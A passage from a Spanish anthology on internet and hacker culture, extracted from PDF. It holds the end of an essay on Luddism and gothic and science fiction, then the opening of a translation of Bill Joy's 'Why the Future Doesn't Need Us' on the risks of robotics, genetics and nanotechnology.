digamos, unos ocho pies de altura, yproporcional en tamaño —lo que hacea lo Grande. La historia de cómo llegó aser tan Malo es el corazón de la novela,bien cobijado en su interior: la historiaes narrada a Víctor en primera personapor la criatura misma, enmarcadadespués dentro de la narrativa delpropio Víctor, que se enmarca a su vezen las cartas del explorador del Ártico,Robert Walton. Más allá de que muchade la vigencia de Frankenstein se debeal genio no reconocido de James Whale,que la tradujo al cine, sigue siendo másque una buena lectura, por todos losmotivos por los que leemos novelas, así

Page 583: Internet, hackers y software li   varios

como por la mucho más limitada razónde su valor luddita: esto es, por suintento, a través de medios literarios queson nocturnos y se mueven condisfraces, de negar a la máquina.

Miren, por ejemplo, el relato deVíctor de cómo ensambló y dio vida a sucriatura. Debe ser, por supuesto, unpoco vago acerca de los detalles, perose nos habla de un procedimiento queparece incluir cirugía, electricidad(aunque nada parecido a lasextravagancias galvánicas de Whale),química e, incluso, desde oscurasreferencias a Paracelsio y AlbertusMagnus, la todavía recientemente

Page 584: Internet, hackers y software li   varios

desacreditada forma de magia conocidacomo alquimia. Lo que está claro, sinembargo, más allá del tantas vecesrepresentado electro-shock-en-el-cuello,es que ni el método ni la criatura queresulta son mecánicos.

Esta es una de varias interesantessimilitudes entre Frankenstein y uncuento anterior de lo Malo y Grande, ElCastillo de Otranto (1765), de HoraceWalpole, usualmente considerada comola primera novela gótica. Por algúnmotivo, ambos autores, al presentar suslibros al público, emplearon vocesajenas. El prefacio de Mary Shelley fueescrito por su marido, Percy, que se

Page 585: Internet, hackers y software li   varios

hacía pasar por ella. No fue hasta 15años después que Mary escribió unaintroducción a Frankenstein en su propionombre. Walpole, por otra parte, leinventó a su libro toda una historiaeditorial, diciendo que era la traducciónde un texto medieval italiano. Recién enel prefacio de la segunda ediciónadmitió su autoría.

Las novelas también tienen orígenesnocturnos asombrosamente similares:las dos son resultado de episodios desueños lúcidos. Mary Shelley, aquelverano de historias de fantasmas enGinebra, intentando dormirse una noche,de pronto vio a la criatura cobrando

Page 586: Internet, hackers y software li   varios

vida, las imágenes surgiendo en sumente «con una vivacidad más allá delos límites usuales del ensueño» .Walpole se había despertado de unsueño, «del cual, todo lo que podíarecordar era que había estado en unantiguo castillo (…) y que en la barandasuperior de una escalera vi unagigantesca mano en una armadura.»

En la novela de Walpole, esta manoresulta ser la mano de Alfonso el Bueno,anterior príncipe de Otranto y, pese a suepitafio, el Molesto residente delcastillo. Alfonso, como la criatura deFrankenstein, está armado por partes —casco de marta con plumas, pie, pierna,

Page 587: Internet, hackers y software li   varios

espada, todas ellas, como la mano,bastante sobredimensionadas— quecaen del cielo o se materializansimplemente aquí y allá por los terrenosdel castillo, inevitables como el lentoregreso de lo reprimido según Freud.Los agentes motivadores, de nuevocomo en Frankenstein, son no-mecánicos. El ensamble final de «laforma de Alfonso, dilatada en unamagnitud inmensa» , se logra a través demedios sobrenaturales: una maldiciónfamiliar, y la mediación del santopatrono de Otranto.

La pasión por la ficción góticadespués de El Castillo de Otranto se

Page 588: Internet, hackers y software li   varios

originaba, yo sospecho, en profundos yreligiosos anhelos de aquellostempranos tiempos míticos que habíanllegado a conocerse como la Edad delos Milagros. De modos más y menosliterales, la gente del siglo XVIII creíaque una vez hace mucho tiempo, todotipo de cosas habían sido posibles y queya no lo eran más. Gigantes, dragones,hechizos. Las leyes de la naturaleza nose habían formulado tan estrictamentepor ese entonces. Lo que había sido unavez magia verdadera en funcionamientohabía, para el tiempo de la Edad de laRazón, degenerado en mera maquinaria.Los oscuros, satánicos molinos de Blake

Page 589: Internet, hackers y software li   varios

representaban una antigua magia que,como Satán, había caído en desgracia.Mientras la religión era secularizadamás y más en Deísmo y descreimiento,el hambre permanente de los hombrespor evidencias de Dios y de vidadespués de la muerte, de salvación —resurrección corporal, de ser posible—,seguía vivo. El movimiento Metodista yel Gran Despertar Americano[100] fueronsólo dos sectores dentro de un vastofrente de resistencia a la Edad de laRazón, un frente que incluía alRadicalismo y la Francmasonería, asícomo a los ludditas y la novela Gótica.Cada uno a su manera expresaba la

Page 590: Internet, hackers y software li   varios

misma profunda resistencia a abandonarelementos de fe, por más irracionalesque fueran, a un orden tecno-políticoemergente que podía o no saber lo queestaba haciendo. El Gótico devinocódigo para medieval, y éste se hizocódigo para milagroso, a través de Pre-Rafaelitas,[101] cartas de tarot fin-de-siècle, novelas del espacio en revistasclase-B, hasta llegar a Star Wars y lashistorias contemporáneas de espadas yhechiceros.

Insistir en lo milagroso es negarle ala máquina al menos una parte de suspretensiones sobre nosotros, afirmar eldeseo limitado de que las cosas

Page 591: Internet, hackers y software li   varios

vivientes, terrestres o de otra especie,en ocasiones puedan volverse tan Malasy Grandes como para intervenir enhechos trascendentes. Según esta teoría,por ejemplo, King Kong (? 1933)deviene un clásico santo luddita. Eldiálogo final de la película, ustedesrecordarán, dice: Bueno, el aviónpudo con él. No… fue la Belleza la quemató a la Bestia. Donde de nuevoencontramos la misma DisyunciónSnoviana, sólo que diferente, entre lohumano y lo tecnológico.

Pero si insistimos en violacionesficcionales a las leyes de la naturaleza—del espacio, del tiempo, de la

Page 592: Internet, hackers y software li   varios

termodinámica, y la número uno, de lamortalidad en sí— entonces nosarriesgamos a ser juzgados por elestablishment literario como PocoSerios. Ser serios acerca de estos temases una manera en que los adultos se handefinido tradicionalmente a sí mismosfrente a los seguros de sí, los inmortalesniños con los que tienen que vérselas.Recordando a Frankenstein, que escribiócuando tenía 19, Mary Shelley dijo,

Tengo un cariño especial por esanovela, pues era la primavera de díasfelices, cuando la muerte y la pena noeran sino palabras que no hallaban ecoverdadero en mi corazón. La actitud

Page 593: Internet, hackers y software li   varios

Gótica en general, debido a queempleaba imágenes de muerte y desobrevivientes fantasmales con fines nomás responsables que los de efectosespeciales y decorados, fue juzgada deinsuficientemente seria y confinada a supropia zona del pueblo. No es el únicobarrio de la gran Ciudad de la Literaturatan, digamos, cuidadosamentedemarcado. En los westerns, la gentebuena siempre gana. En las novelasrománticas, el amor supera losobstáculos. En los policiales, sabemosmás que los personajes. Nosotrosdecimos, Pero el mundo no es así. Estosgéneros, al insistir en lo que es contrario

Page 594: Internet, hackers y software li   varios

a los hechos, no llegan a sersuficientemente Serios, y entonces se lespone la etiqueta de viajes escapistas.

Esto es especialmente lamentable enel caso de la ciencia ficción, en la cualpudo verse en la década posterior aHiroshima uno de los florecimientosmás impresionantes de talento literarioy, muchas veces, de genio de nuestrahistoria. Fue tan importante como elmovimiento Beat que tenía lugar almismo tiempo, ciertamente másimportante que la ficción popular que,apenas con algunas excepciones, sehabía paralizado por el clima políticode la guerra fría y los años de

Page 595: Internet, hackers y software li   varios

McCarthy. Además de ser una síntesiscasi ideal de las Dos Culturas, resultaque la ciencia ficción también fue uno delos principales refugios, en nuestrotiempo, para aquellos de ideas ludditas.

Para 1945, el sistema fabril —que,más que ninguna otra pieza demaquinaria, fue el auténtico legado de laRevolución Industrial— se habíaextendido hasta abarcar el ProyectoManhattan, el programa de cohetes delarga distancia de Alemania y loscampos de concentración, comoAuschwitz. No hizo falta ningún donespecial de adivinación para ver cómoestas tres curvas de desarrollo podrían

Page 596: Internet, hackers y software li   varios

plausiblemente converger, y en nomucho tiempo. Desde Hiroshima, hemosvisto a las armas nucleares multiplicarsefuera de control, y los sistemas dedireccionamiento adquieren, con finesglobales, alcance y precisión ilimitadas.La aceptación impasible de unholocausto de hasta siete y ocho cifrasen la cuenta de cuerpos, se haconvertido —entre aquellos que, enparticular desde 1980, han guiadonuestras políticas militares— en unahipótesis natural.

Para la gente que estaba escribiendociencia ficción en los ’50, nada de estoera una sorpresa, aunque las

Page 597: Internet, hackers y software li   varios

imaginaciones de los ludditas modernostodavía tienen que encontrar algunacontra-criatura tan Grande y Mala,incluso en la más irresponsable de lasficciones, que se le pueda comparar a loque pasaría durante una guerra nuclear.Así, en la ciencia ficción de la EraAtómica y la Guerra Fría, vemos tomaruna dirección diferente a los impulsosludditas de negar la máquina. El ángulotecnológico perdió énfasis en favor depreocupaciones más humanísticas —exóticas evoluciones culturales yescenarios sociales, paradojas y juegosde espacio/tiempo, salvajes preguntasfilosóficas—, la mayoría compartiendo,

Page 598: Internet, hackers y software li   varios

como ha discutido en extenso la críticaliteraria, una definición de humanocomo particularmente distinto demáquina. Al igual que sus contrapartesoriginales, los ludditas del siglo XXmiraron anhelantes hacia atrás, haciaotra era —curiosamente, a la mismaEdad de la Razón que había empujado alos primeros ludditas a la nostalgia porla Edad de los Milagros.

Pero ahora vivimos, se nos dice, enla Era de las Computadoras. ¿Quépronósticos hay para la sensibilidadluddita? ¿Atraerán los CPU la mismaatención hostil que alguna vezdespertaron las máquinas de tejer?

Page 599: Internet, hackers y software li   varios

Realmente, lo dudo. Escritores de todoslos estilos van en estampida a comprarprocesadores de texto. Las máquinas yase han vuelto tan amigables que inclusoel más irreductible luddita puede caerseducido a bajar la guardia y apretarseunas teclas. Detrás de esto parece haberun creciente consenso acerca de que elconocimiento realmente es poder, quehay una conversión bastante directaentre dinero e información y que, dealguna manera, si la logística sesoluciona, puede que los milagrostodavía sean posibles. Si esto es así, losludditas quizás hayan llegado finalmentea un terreno común con sus adversarios

Page 600: Internet, hackers y software li   varios

Snovianos, la sonriente armada detecnócratas que se suponía llevaba elfuturo en los huesos. Quizás sólo seauna nueva forma de la incesanteambivalencia luddita respecto a lasmáquinas, o puede ser que la esperanzade milagro más profunda de los ludditashaya venido a residir en la habilidad delas computadoras para conseguir lainformación correcta y dársela aaquellos a quiénes esa información serámás útil. Con los adecuados programasde financiamiento y tiempo, con lascomputadoras curaremos el cáncer, nossalvaremos de la extinción nuclear,produciremos comida para todos,

Page 601: Internet, hackers y software li   varios

desintoxicaremos los resultados de lacodicia industrial devenida psicopatía—véanse todas las melancólicasensoñaciones de nuestro tiempo.

La palabra luddita se sigue usandocon desprecio para cualquiera con dudasacerca de la tecnología, especialmentela de tipo nuclear. Los ludditas hoy yano están más enfrentados a humanosdueños de fábricas y a máquinasvulnerables. Como profetizó elrenombrado presidente y ludditainvoluntario D. D. Eisenhower al dejarsu puesto, hay ahora un permanente,poderoso sistema de almirantes,generales y directores de corporaciones,

Page 602: Internet, hackers y software li   varios

frente al cual nosotros, pobres bastardoscomunes, estamos completamentedesclasados, aunque Ike no lo dijo conesas palabras. Se supone que debemosquedarnos tranquilos y dejar que lascosas sigan andando, incluso aunque,debido a la revolución de lainformación, se hace cada día másdifícil engañar a cualquiera porcualquier lapso de tiempo. Si nuestromundo sobrevive, el siguiente grandesafío a tener en cuenta va a ser —looyeron acá, en primicia— cuando lascurvas de investigación y desarrollo eninteligencia artificial, biologíamolecular y robótica converjan. ¡Ay! Va

Page 603: Internet, hackers y software li   varios

a ser increíble e impredecible, y hastalos mandos más altos, recemosdevotamente, van a llegar a destiempo.Ciertamente es algo para que todos losbuenos ludditas le prestemos atención si,Dios mediante, llegamos a vivir tanto.

Mientras, como norteamericanos,podemos buscar alivio, por escaso y fríoque sea, en la improvisada y maliciosacanción de Lord Byron, en la que, comootros observadores de su tiempo,percibió relaciones evidentes entre losprimeros ludditas y nuestros propiosorígenes revolucionarios. Así empieza:

Como los compañeros de la Libertadmás allá del mar Compraron su libertad,

Page 604: Internet, hackers y software li   varios

barata, con su sangre, Así haremosnosotros, muchachos. Vamos A morirpeleando, o a vivir libres. ¡Y que caigantodos los reyes menos el Rey Ludd!

Page 605: Internet, hackers y software li   varios

Por que el futuro nonos necesita

Bill Joy integró el grupo de hackersde la Universidad de Berkeley. Allí segraduó a los veinte años en 1975. En eseperíodo desarrolló la versión BSD delsistema operativo UNIX, una de las másprestigiosas. A principios de los ‘80dejó la Universidad y fundó la empresaSun Microsystems con algunoscompañeros en la cual desarrollólenguajes de programación como JAVAorientados a la transmisión de datos enInternet, y de código abierto,fundamentales en la red. Se lo considerauno de los ingenieros electrónicos y

Page 606: Internet, hackers y software li   varios

científicos informáticos másimportantes de la actualidad. En 2003dejó Sun Microsystems.

El artículo «Por qué el futuro no nosnecesita» salió publicado en el númerode abril de 2000 de la revistanorteamericana Wired. Wired es lapublicación estrella de la industria de lascomunicaciones y la alta tecnología, laexpansión de la cual acompañó desdeprincipios de los ‘90. Wired rescata lashistorias y el costado creativo de lasnuevas tecnologías, e incluye en susfirmas a escritores de ciencia ficcióncomo Sterling, Gibson y Stephenson. Dauna visión celebratoria y despolitizadade los efectos de la tecnología en lassociedades, visión que aparececuestionada en el artículo de Joy.

Page 607: Internet, hackers y software li   varios

Desde el momento en que meinvolucré en la creación de nuevastecnologías, sus dimensiones éticas mehan interesado, pero fue recién en elotoño de 1998 que tomé consciencia,con ansiedad, de lo grandes que son lospeligros que nos esperan en el sigloXXI. Puedo situar en el tiempo el iniciode mi incomodidad, en el día en queconocí a Ray Kurzweil, el famosoinventor de la primera máquina delectura para ciegos y de muchas otrascosas asombrosas.

Ray y yo éramos ambos oradores enla conferencia de George Gilder enTelecosm, y me encontré con él por

Page 608: Internet, hackers y software li   varios

casualidad en el bar del hotel luego deque nuestras sesiones hubieranterminado. Yo estaba sentado con JohnSearle, un filósofo de Berkeley queestudia la conciencia. Mientrashablábamos, Ray se acercó y empezóuna conversación, cuyo tema mepersigue hasta el día de hoy.

Yo me había perdido la charla deRay y el panel de discusión posterior enel que habían estado Ray y John, y ahoraellos retomaron desde donde lo habíandejado, con Ray diciendo que los ritmosdel avance de la tecnología iban aacelerarse y que nosotros íbamos aconvertirnos en robots o a fusionarnos

Page 609: Internet, hackers y software li   varios

con robots o algo parecido, y Johnrespondía que esto no podía pasar,porque los robots no podían tenerconciencia.

Aunque había escuchado esaconversación otras veces, siempre habíasentido que los robots sensiblespertenecían al reino de la cienciaficción. Pero ahora, de alguien por quiensentía respeto, estaba escuchando unargumento fuerte de que eran unaposibilidad a corto plazo. Me tomó porsorpresa, especialmente dada la probadahabilidad de Ray de imaginar y crear elfuturo. Yo ya sabía que nuevastecnologías como la ingeniería genética

Page 610: Internet, hackers y software li   varios

y la nanotecnología estaban dándonos elpoder de rehacer el mundo, pero unescenario realista y cercano de robotscon inteligencia me descolocó.

Es fácil saturarse de esos adelantos.Casi todos los días oímos en las noticiasalgún tipo de avance tecnológico ocientífico. Pero ésta no era unapredicción común. En el bar del hotel,Ray me dio una prueba de impresión desu libro que estaba por salir, The age ofspiritual machines [La era de lasmáquinas espirituales][102], en el queesbozaba una utopía que él veía en elfuturo: los humanos estarían cerca deobtener la inmortalidad a través de

Page 611: Internet, hackers y software li   varios

volverse una misma cosa con latecnología robótica. Al leerlo, misensación de desagrado sólo se hizo másintensa; me sentía seguro de que él teníaque estar entendiendo los peligros,entendiendo la probabilidad de unresultado negativo por ese camino.

Todavía me sentí peor por un pasajeen que se describía un escenariodistópico:

El nuevo desafío ludditaPrimero imaginemos que los

científicos informáticos tienen éxitoen crear máquinas inteligentes quepueden hacer todo mejor que los

Page 612: Internet, hackers y software li   varios

seres humanos. Entonces, se puedeesperar que todo el trabajo lorealicen vastos sistemas demáquinas altamente organizadas yque ya no sea necesario ningúnesfuerzo humano. Una de dos cosaspueden ocurrir. Se le podríapermitir a las máquinas tomar todaslas decisiones por sí mismas sinsupervisión humana, o bien semantendría el control humano sobrelas máquinas.

Si se les permite a las máquinastomar todas las decisiones, nopodemos hacer ninguna conjeturaacerca de los resultados, porque es

Page 613: Internet, hackers y software li   varios

imposible adivinar cómo secomportarían tales máquinas.Solamente señalamos que eldestino de la raza humana quedaríaa merced de las máquinas. Se diráque la raza humana no sería nuncatan tonta como para dejarle todo elpoder a las máquinas. Pero nosugerimos ni que la raza humanaentregaría el poder voluntariamenteni que las máquinas tomarían elpoder por propia iniciativa. Lo quesugerimos es que la raza humanafácilmente podría dejarse llevarhasta una posición de dependenciatal que las máquinas no tendrían

Page 614: Internet, hackers y software li   varios

otra opción práctica que asumirtodas sus decisiones. Al volversela sociedad y los problemas queenfrenta más y más complejos, y lasmáquinas volverse más y másinteligentes, la gente dejará que lasmáquinas tomen más decisiones porella, simplemente porque lasdecisiones que tomen las máquinasproducirán mejores resultados quelas decisiones tomadas porhumanos. Eventualmente sealcanzará un punto en el que lasdecisiones imprescindibles paramantener funcionando el sistemaserán tan complejas que excederán

Page 615: Internet, hackers y software li   varios

las capacidades de los sereshumanos de hacerlo correctamente.En ese punto las máquinas tendránel control efectivo. La gentesencillamente no podrá apagar lasmáquinas, porque dependerán tantode ellas que apagarlas equivaldríaa suicidarse.

Por el otro lado, es posible queel control humano sobre lasmáquinas sea retenido. En ese casoel hombre promedio tendría controlsobre ciertas máquinas privadas,de su propiedad, como ser su autoo su computadora personal, pero elcontrol sobre grandes sistemas de

Page 616: Internet, hackers y software li   varios

máquinas quedará en manos de unapequeña elite tal como sucede hoy,pero con dos diferencias. Gracias atécnicas más desarrolladas la elitecontará con un mayor control sobrelas masas; y debido a que el trabajohumano ya no será necesario lasmasas serán superfluas, una cargainútil para el sistema. Si la elitesencillamente es impiadosa podríadecidir exterminar las masashumanas. Si es más humana podríaemplear propaganda u otrastécnicas psicológicas o biológicaspara reducir los índices denatalidad hasta que la masa humana

Page 617: Internet, hackers y software li   varios

se extinga, dejándole el mundo a laelite. O, si la elite consiste enliberales [liberals] de corazónblando, podrían decidir interpretarel papel de buenos pastores delresto de la raza humana. Cuidaránde que las necesidades físicas detodos estén satisfechas, de que loschicos sean criados bajocondiciones psicológicashigiénicas, que todos tengan unsano hobby para entretenerse, y quecualquiera que se sientainsatisfecho reciba un«tratamiento» que lo cure de su«problema». Desde ya, la vida

Page 618: Internet, hackers y software li   varios

carecerá de sentido a tal extremoque la gente tendrá que serreprogramada biológica opsicológicamente ya sea pararemoverles su necesidad delproceso de poder o para«sublimarles» su ansia de poderhacia algún hobby inofensivo.Estos seres humanosreprogramados podrían ser felicesen esa sociedad, pero ciertamenteno serán libres. Habrán sidoreducidos al estatus de animalesdomésticos[103].

En el libro no se descubre, hasta que

Page 619: Internet, hackers y software li   varios

se da vuelta la página, que el autor delfragmento es Theodore Kaczynski elUnabomber. No soy para nada unapologista de Kaczynski. Sus bombasmataron a tres personas durante unacampaña de 17 años de terror e hirierona muchas otras. Una de sus bombas hiriógravemente a mi amigo David Gelernter,uno de los más brillantes y visionarioscientíficos informáticos de nuestrotiempo. Como muchos de mis colegas,yo sentí que tranquilamente podía ser elsiguiente blanco del Unabomber.

Los actos de Kaczynski fueronasesinos y, creo, dementes. Claramentees un luddita, pero decir esto no anula

Page 620: Internet, hackers y software li   varios

sus argumentos; tan difícil como meresulta a mí aceptarlo, ví cierto méritoen el razonamiento de esta cita enespecial. Me sentí llamado aconfrontarlo.

La visión distópica de Kaczynskidescribe consecuencias que no habíansido previstas, un problema que es muyconocido en el diseño y uso detecnología, problema claramenterelacionado a la ley de Murphy

Cualquier cosa que pueda salir mal,saldrá mal. (De hecho, esta es la leyde Finagle, lo que en sí mismo muestraque Finagle tenía razón). Nuestroexcesivo uso de antibióticos ha llevado

Page 621: Internet, hackers y software li   varios

a lo que puede ser el mayor de estosproblemas hasta ahora: la aparición debacterias resistentes a los antibióticos ymucho más peligrosas. Cosas similarespasaron cuando los intentos de eliminara los mosquitos de la malaria usandoDDT llevaron a que éstos adquirieranresistencia al DDT; al mismo tiempo,los parásitos de la malaria adquirierongenes resistentes a múltiples drogas.[104]

El motivo de muchas de esassorpresas parece evidente: los sistemasen cuestión son complejos, e involucraninteracciones y relaciones de ida yvuelta entre muchos componentes.Cualquier cambio en uno de éstos

Page 622: Internet, hackers y software li   varios

sistemas se propagará en formas que sonmuy difíciles de predecir; esto esespecialmente cierto cuando hayinvolucradas acciones humanas.

Empecé mostrándoles a amigos lacita de Kaczynski en La era de lasmáquinas espirituales: les daba el librode Kurzweil, dejaba que leyeran elfragmento, y después miraba cómoreaccionaban al enterarse de quién lohabía escrito. Por esa época, encontré ellibro de Moravec Robot: Mere Machineto Trascendental Mind.[105] Moravec esuno de los líderes en la investigación enrobótica, y fue fundador del programa deinvestigación de robótica más grande

Page 623: Internet, hackers y software li   varios

del mundo, en la Universidad deCarnegie Mellon. Robot me dio másmaterial para probar con mis amigosmaterial que sorprendentemente apoyabael argumento de Kaczynski. Porejemplo:

El corto plazo (principios dedécada)

Las especies biológicas casinunca sobreviven a encuentros concompetidores superiores. Diezmillones de años atrás, Américadel Norte y del Sur estabanseparadas por un istmo de Panamáhundido. Sud América, como hoy

Page 624: Internet, hackers y software li   varios

Australia, estaba habitada pormamíferos marsupiales, incluyendoalgunos con bolsas abdominalesequivalentes de las ratas, ciervos ytigres. Cuando el istmo queconectaba el Sur con el Norteemergió, les tomó sólo algunosmiles de años a las especiesplacentadas del norte, conmetabolismos y sistemas nerviososy reproductivos un poco másefectivos, desplazar y eliminar acasi todos los marsupiales del sur.

En un mercado totalmente libre,los robots superiores seguramenteafectarían a los humanos como los

Page 625: Internet, hackers y software li   varios

placentados norteamericanosafectaron a los marsupiales deSudamérica (y como los humanoshan afectado a innumerablesespecies). Las industrias robóticascompetirían entre ellas con vigorpor materia, energía, y espacio,llevando eventualmente los preciosmás allá del alcance humano.Imposibilitados de afrontar lasnecesidades vitales, los humanosbiológicos serían obligados adesaparecer.

Con seguridad se puederespirar tranquilos todavía, porqueno vivimos en un mercado libre

Page 626: Internet, hackers y software li   varios

absoluto. Los gobiernos regulan loscomportamientos, especialmenterecaudando impuestos. Aplicadoscon juicio, los frenosgubernamentales podrían sostener auna población humana que viva concalidad de los frutos deltrabajorobot, quizás por un largotiempo.

Una distopía de manual y Moravecrecién está empezando. Prosiguediscutiendo cómo nuestra principalocupación en el siglo XXI será«garantizar cooperación continua de lasindustrias de robots» mediante leyes que

Page 627: Internet, hackers y software li   varios

declaren que éstos deben ser«amigables»,[ 106] y describiendo qué tanpeligroso puede ser un ser humano«luego de convertirse en un robotsuperinteligente sin límitesestablecidos.» La visión de Moravec esque los robots eventualmente nos van asuperar que los humanos se enfrentanabiertamente a la extinción.

Decidí que era hora de hablar conmi amigo Danny Hillis. Danny se hizofamoso como cofundador de ThinkingMachines Corporation [Corporación deMáquinas Pensantes], que construyó unamuy poderosa supercomputadoraparalela. Pese a mi trabajo como

Page 628: Internet, hackers y software li   varios

Director Científico en SunMicrosystems, soy más arquitecto decomputadoras que científico, y respetolos conocimientos de Danny sobreciencia física y de la información másque los de cualquier otra persona queconozca. Danny también es un futuristamuy influyente que piensa a largo plazocuatro años atrás creó la Long NowFoundation [Fundación del LargoPresente], que está construyendo un relojdiseñado para durar 10.000 años, en unintento por llamar la atención acerca delo patéticamente cortos que son loshorizontes de tiempo por los que sepreocupa nuestra sociedad. [107]

Page 629: Internet, hackers y software li   varios

Así es que viajé a Los Ángeles nadamás que para cenar con Danny y suesposa, Pati. Pasé por mi rutina decontarles las ideas y fragmentos que meresultaban tan chocantes. La respuestade Danny en relación al escenario deKurzweil de humanos fundiéndose conrobots vino de inmediato, y mesorprendió. Dijo, sencillamente, que loscambios sucederían gradualmente, y quenos acostumbraríamos a ellos.

Pero supongo que no estabasorprendido del todo. Había visto unacita de Danny en el libro de Kurzweil enla que decía: Quiero tanto a micuerpo como cualquiera, pero si puedo

Page 630: Internet, hackers y software li   varios

llegar a los 200 años con un cuerpo desilicona, lo voy a aceptar. Daba lasensación de estar tranquilo con lamanera en que se daban las cosas y suseventuales riesgos, mientras que yo no.

Mientras hablaba y pensaba sobreKurzweil, Kaczynski y Moravec, depronto me acordé de una novela quehabía leído unos 20 años antes La pesteblanca, de Frank Herbert en la que unbiólogo molecular se vuelve loco por elasesinato sin sentido de su familia. Paravengarse crea y dispersa una plaganueva y contagiosa que mataampliamente pero de manera selectiva.(Tenemos suerte de que Kaczynski era

Page 631: Internet, hackers y software li   varios

matemático, no biólogo molecular).También me vino a la mente el Borg deStar Trek, un enjambre de criaturas enparte biológicas y en parte robóticas conun enorme impulso destructivo. Lascatástrofes Borg son materia prima de laciencia ficción, entonces ¿por qué no mehabía angustiado antes por distopíasrobóticas como esa? ¿Por qué no había,además, otras personas preocupadas porestos escenarios de pesadilla?

Parte de la respuesta yace en nuestraactitud hacia lo nuevo en nuestradisposición a familiarizarnos rápido y aaceptar sin cuestionar. Acostumbrados avivir con adelantos científicos que se

Page 632: Internet, hackers y software li   varios

dan casi como una rutina, todavíatenemos que hacernos la idea de que lastecnologías más seductoras del sigloXXI robótica, ingeniería genética ynanotecnología plantean una amenazadistinta que la de las tecnologías que hanvenido antes. Puntualmente, los robots,los organismos diseñados y lananotecnología comparten un peligrosofactor amplificador: puedenautoreplicarse.[108] Una bomba se hacedetonar una sola vez pero un robotpuede volverse muchos, y rápidamentesalirse de control.

Gran parte de mi trabajo en losúltimos 25 años estuvo centrado en

Page 633: Internet, hackers y software li   varios

redes de computadoras, donde el envío yrecepción de mensajes crea laposibilidad de replicaciones fuera decontrol. Pero mientras que la replicaciónen una computadora o una red decomputadoras puede ser una granmolestia, a lo sumo cuelga unacomputadora o hace caer un servicio deredes. La autoreplicación sin controlesen estas nuevas tecnologías conduce ariesgos mucho mayores: riesgo de dañossustanciales dentro del mundo físico.

Cada una de estas tecnologías,además, anuncia grandes promesas: lavisión de semi-inmortalidad queKurzweil ve en sus sueños robóticos nos

Page 634: Internet, hackers y software li   varios

transporta al futuro; la ingenieríagenética podría pronto dar tratamientos,e incluso curas, para la mayoría de lasenfermedades; y la nanotecnología y lananomedicina pueden encargarse detodavía más enfermedades. Juntaspodrían extender de manera significativael promedio de nuestras expectativas devida y mejorar su calidad. Sin embargo,con cada una de estas tecnologías, unaserie de mínimos avances, importantesen sí mismos, conducen hacia unaacumulación de gran poder e,inseparablemente, de gran peligro.

¿Qué era distinto en el siglo XX?Ciertamente, las tecnologías en que se

Page 635: Internet, hackers y software li   varios

basaban las armas de destrucciónmasiva (ADM) nucleares, biológicas, yquímicas (NBQ) eran poderosas, y lasarmas eran una enorme amenaza. Perofabricar armas nucleares requería, almenos por un tiempo, acceso tanto amateriales muy escasos, a vecesinconseguibles, como a informaciónaltamente protegida; los programas dearmas biológicas y químicas tambiéntendían a requerir actividades a granescala.

Las tecnologías del siglo XXIgenética, nanotecnología, y robótica(GNR) son tan poderosas que puedenimpulsar clases enteramente nuevas de

Page 636: Internet, hackers y software li   varios

accidentes y abusos. Todavía máspeligroso: por primera vez estosaccidentes y abusos están al alcance deindividuos o grupos reducidos. Norequerirán gran infraestructura nimateriales con complicaciones. Elconocimiento bastará para poderusarlas.

Así, tenemos la posibilidad ya nosólo de armas de destrucción masivasino de destrucción masiva habilitadapor el conocimiento, siendo estadestructividad ampliada enormementepor el poder de la auto-replicación.

Yo creo que no es una exageracióndecir que estamos en el punto más

Page 637: Internet, hackers y software li   varios

elevado de la perfección del malextremo, un mal cuya posibilidad va másallá de la que las armas de destrucciónmasiva le daban a los estados-nación, yque alcanza niveles sorprendentes yterribles de acumulación de poder enmanos de individuos aislados.

Nada en la manera en que me vírelacionado con las computadoras meinsinuaba que iba a tener que hacermecargo de estos temas.

Mi vida ha estado impulsada por unaprofunda necesidad de hacer preguntas yhallar respuestas. Cuando tenía 3 años,ya leía, por lo que mi padre me llevó a

Page 638: Internet, hackers y software li   varios

la escuela, donde me senté en lasrodillas del director y le leí un cuento.Empecé temprano la escuela, despuésme salteé un grado, y me fugué a travésde los libros estaba increíblementemotivado para aprender. Hacía muchaspreguntas, a menudo volviendo locos alos adultos.

En la adolescencia estaba muyinteresado en la ciencia y la tecnología.Quería ser radio aficionado, pero notenía plata para comprar el equipo. Laradio y los operadores de radio eran laInternet de la época: muy adictiva, ybastante solitaria. Más allá de loeconómico, mi madre bajó el pulgar no

Page 639: Internet, hackers y software li   varios

iba a ser radio aficionado; ya erademasiado antisocial.

A lo mejor no tenía tantos amigosíntimos, pero estaba lleno de ideas. Enla secundaria, ya había descubierto a losgrandes escritores de ciencia ficción.Me acuerdo en especial de «HaveSpacesuit Will Travel» de Heinlein, yYo, Robot de Asimov, con sus TresLeyes de la Robótica. Me fascinaron lasdescripciones de los viajes en elespacio, y quería tener un telescopiopara mirar las estrellas; dado que notenía plata para comprar o hacer uno,sacaba libros de construcción detelescopios de la biblioteca y, en su

Page 640: Internet, hackers y software li   varios

lugar, leía sobre la manera en que seconstruían. Volaba en mi imaginación.

Los jueves a la noche mis padresiban al bowling, y los chicos nosquedábamos solos en la casa. Era lanoche del Star Trek original de GeneRoddenberry, y el programa me causóuna gran impresión. Terminé aceptandola noción de que los humanos tenían unfuturo en el espacio, al estilo del FarWest, con grandes héroes y aventuras.La visión de Roddenberry de los siglosvenideros era una de valores moralesfirmes, basados en códigos como laDirectiva Principal: no interferir enel desarrollo de civilizaciones menos

Page 641: Internet, hackers y software li   varios

avanzadas tecnológicamente. Estoera algo muy atrapante para mí: los quedominaban ese futuro eran humanos conética, no robots, y yo hice propio elsueño de Roddenberry.

Me destaqué en matemáticas en lasecundaria, y cuando estudiaba paraingeniería en la Universidad deMichigan, seguí el plan de estudios de laespecialización en matemática. Resolverproblemas matemáticos era un desafíointeresante, pero cuando descubrí lascomputadoras encontré algo muchomejor: una máquina en la cual tú podíasponer un programa que intentabaresolver un problema, y luego la

Page 642: Internet, hackers y software li   varios

máquina rápidamente buscaba lasolución. La computadora tenía nocionesmuy precisas de lo correcto/loincorrecto, lo falso/lo verdadero. Esoera muy seductor.

Tuve suerte y pude conseguir empleoprogramando algunos de los primerosmodelos de supercomputadoras, ydescubrí el poder sorprendente de lasgrandes máquinas para simular diseñosnuméricamente avanzados. Cuando fui ala escuela de graduados en Berkeley amediados de los ‘70, empecé aquedarme despierto hasta tarde, o todala noche, inventando nuevos mundosdentro de las máquinas. Resolviendo

Page 643: Internet, hackers y software li   varios

problemas. Escribiendo el código quetanto pedía ser escrito.

